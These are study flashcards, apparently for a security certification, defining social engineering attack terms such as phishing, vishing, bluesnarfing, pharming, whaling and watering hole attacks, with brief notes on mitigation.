Social Engineering Flashcards

1
Q

A social engineering technique whereby attackers under disguise of a legitimate request attempt to gain access to confidential information is commonly referred to as:

A

phising

It’s a type of social engineering attack where attackers pose as trustworthy entities to trick individuals into revealing sensitive information, such as passwords or financial data, or to click on malicious links. It’s a common tactic used to gain unauthorized access to systems or compromise personal information.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

smishing

A

specifically related to text messaging (SMS), it stands for “SMS phishing.” Attackers send deceptive text messages to trick recipients into providing sensitive information or clicking on malicious links. It’s similar to traditional phishing, but it targets mobile devices through SMS rather than email.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

vishing

A

Correct, “vishing” stands for “voice phishing.” It’s a social engineering technique where attackers use phone calls to deceive individuals into providing sensitive information or performing certain actions. They might impersonate trusted entities like banks or government agencies and use various tactics to manipulate victims into divulging personal or financial information. Vishing can also involve automated voice messages prompting recipients to call back and provide information, or to visit a fake website or call a fake number.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

What type of spam relies on text-based communication?

A

SPIM. It involves the unsolicited sending of messages over instant messaging platforms. It’s similar to email spam but occurs through instant messaging services.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

SPIT

A

SPIT” stands for “Spam over Internet Telephony.”

An example of SPIT could be receiving unsolicited automated voice messages advertising a product or service over a Voice over Internet Protocol (VoIP) service. For instance, you might receive a call promoting a dubious investment opportunity or offering a fake prize in exchange for personal information. These messages are similar to traditional email spam but are transmitted through voice channels instead.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Bluesnarfing

A

Bluesnarfing is a type of cyberattack where unauthorized access is gained to a Bluetooth-enabled device, such as a smartphone, tablet, or laptop, to steal data. It typically involves exploiting vulnerabilities in the Bluetooth protocol to access the device’s data, such as contacts, text messages, emails, and files, without the user’s knowledge or consent. Attackers can use this stolen information for various malicious purposes, including identity theft, financial fraud, or corporate espionage.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

spear phishing

A

Spear phishing is a targeted form of phishing where attackers tailor their messages to specific individuals or organizations. Unlike traditional phishing attacks that cast a wide net, spear phishing emails are customized to appear more credible and personalized, often using information obtained from social media or other sources.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Dumpster Diving

A

the term “Dumpster diving” is used to describe a practice of sifting through trash for discarded documents containing sensitive data. Found documents containing names and surnames of the employees along with the information about positions held in the company and other data can be used to facilitate social engineering attacks. Having the documents shredded or incinerated before disposal makes dumpster diving less effective and mitigates the risk of social engineering attacks.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

pharming

A

Pharming is a cyberattack where attackers manipulate the Domain Name System (DNS) or compromise a user’s hosts file to redirect them to a fake website, typically designed to mimic a legitimate one. The goal of pharming is to trick users into visiting the fake website, where they may unknowingly enter sensitive information such as login credentials, credit card numbers, or personal details. This stolen information can then be used for various malicious purposes, such as identity theft or financial fraud. Pharming attacks can be particularly dangerous because they can be difficult for users to detect since they are redirected to fraudulent sites without their knowledge or consent.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

elicitation

A

Elicitation is a technique used by attackers to gather information from individuals or organizations through subtle and indirect means. It involves skillfully extracting information by asking leading questions, engaging in casual conversation, or leveraging psychological tactics without arousing suspicion.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

whaling

A

while both spear phishing and whaling are targeted phishing attacks, spear phishing focuses on specific individuals or groups within an organization, whereas whaling targets high-profile individuals or executives with greater authority and access to valuable resources.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

typosquatting / url hijacking

A

Typosquatting, also known as URL hijacking, is a malicious tactic where attackers register domain names that are similar to legitimate ones but contain slight misspellings or typographical errors. These deceptive domain names are often used to trick users who mistype or misspell a website’s URL into visiting the attacker-controlled site instead of the intended destination.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

data URL phishing

A

Data URL phishing, attackers embed malicious code or sensitive data within the URL itself, typically by encoding it using the data URI scheme. This technique allows attackers to bypass traditional security measures and deceive users into clicking on seemingly harmless links that actually lead to malicious content or websites.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

prepending

A

Prepending is a type of data url phishing that involves adding this encoded data to the beginning of a URL, making it appear legitimate to unsuspecting users.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

Virus hoax

A

An email message containing a warning related to a non-existent computer security threat, asking a user to delete system files falsely identified as malware, and/or prompting them to share the message

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

Which social engineering attack relies on identity theft?

A

mpersonation is a technique used in various contexts, including cyberattacks, where an individual or entity pretends to be someone else in order to deceive others or gain unauthorized access to information or resources. In the context of cybersecurity, impersonation often involves pretending to be a legitimate user, system, or organization to trick individuals into disclosing sensitive information, granting access to systems, or performing certain actions.

16
Q

Watering hole attack

A

A watering hole attack is a type of cyberattack that targets a specific group of users by compromising websites that they frequently visit. The attackers identify websites that are regularly visited by the target group, often referred to as the “watering hole,” and then infect these websites with malware or malicious code.

When users from the targeted group visit these compromised websites, their devices may become infected with malware without their knowledge. This malware can then be used to steal sensitive information, gain unauthorized access to systems, or carry out other malicious activities.

17
Q

How to mitigate watering hole attacks

A

Mitigating watering hole attacks requires a combination of measures, including regular security updates and patches, the use of web filtering and antivirus software, and employee training to recognize and avoid suspicious websites. Additionally, website owners should implement robust security measures to prevent their sites from being compromised in the first place.